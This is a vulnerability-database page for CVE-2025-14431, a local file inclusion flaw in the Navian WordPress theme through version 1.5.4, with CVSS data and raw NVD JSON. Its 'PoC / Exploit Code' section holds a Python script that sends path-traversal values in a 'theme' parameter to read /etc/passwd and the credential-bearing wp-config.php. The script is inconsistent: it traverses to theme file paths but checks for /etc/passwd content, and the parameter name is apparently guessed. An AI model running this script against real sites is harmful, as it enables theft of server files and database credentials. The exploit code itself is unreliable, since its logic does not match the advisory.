Security Vulnerability Report
中文
CVE-2025-14431 CVSS 8.1 HIGH

CVE-2025-14431

Published: 2026-01-08 10:15:46
Last Modified: 2026-04-27 17:16:25

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in THEMELOGI Navian navian allows PHP Local File Inclusion.This issue affects Navian: from n/a through <= 1.5.4.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Navian Theme <= 1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-14431 Navian Theme LFI PoC # Target: WordPress site using Navian theme <= 1.5.4 target = "http://target-site.com" # Common vulnerable paths in Navian theme vulnerable_paths = [ "/wp-content/themes/navian/wpb/templates/config.php", "/wp-content/themes/navian/wpb/functions.php", "/wp-content/themes/navian/include/template-tags.php" ] # Test for LFI by reading /etc/passwd def test_lfi(target_url, path): """Test for Local File Inclusion vulnerability""" params = { "theme": "../../../../../../../../.." + path } try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: if "root:" in response.text or "www-data" in response.text: print(f"[+] LFI Confirmed at: {path}") print(response.text[:500]) return True except Exception as e: print(f"[-] Error: {e}") return False # Read wp-config.php def read_wp_config(target_url): """Attempt to read WordPress configuration file""" params = { "theme": "../../../../../../../../../../wp-config.php" } try: response = requests.get(target_url, params=params, timeout=10) if "DB_NAME" in response.text: print("[+] Successfully read wp-config.php") return response.text except Exception as e: print(f"[-] Error: {e}") return None # Main exploitation for path in vulnerable_paths: url = target + "/" if test_lfi(url, path): break

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14431", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:46.463", "lastModified": "2026-04-27T17:16:25.340", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in THEMELOGI Navian navian allows PHP Local File Inclusion.This issue affects Navian: from n/a through <= 1.5.4."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en un programa PHP vulnerabilidad de 'inclusión remota de ficheros PHP' en THEMELOGI Navian navian permite la inclusión local de ficheros PHP. Este problema afecta a Navian: desde n/a hasta &lt;= 1.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/navian/vulnerability/wordpress-navian-theme-1-5-4-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}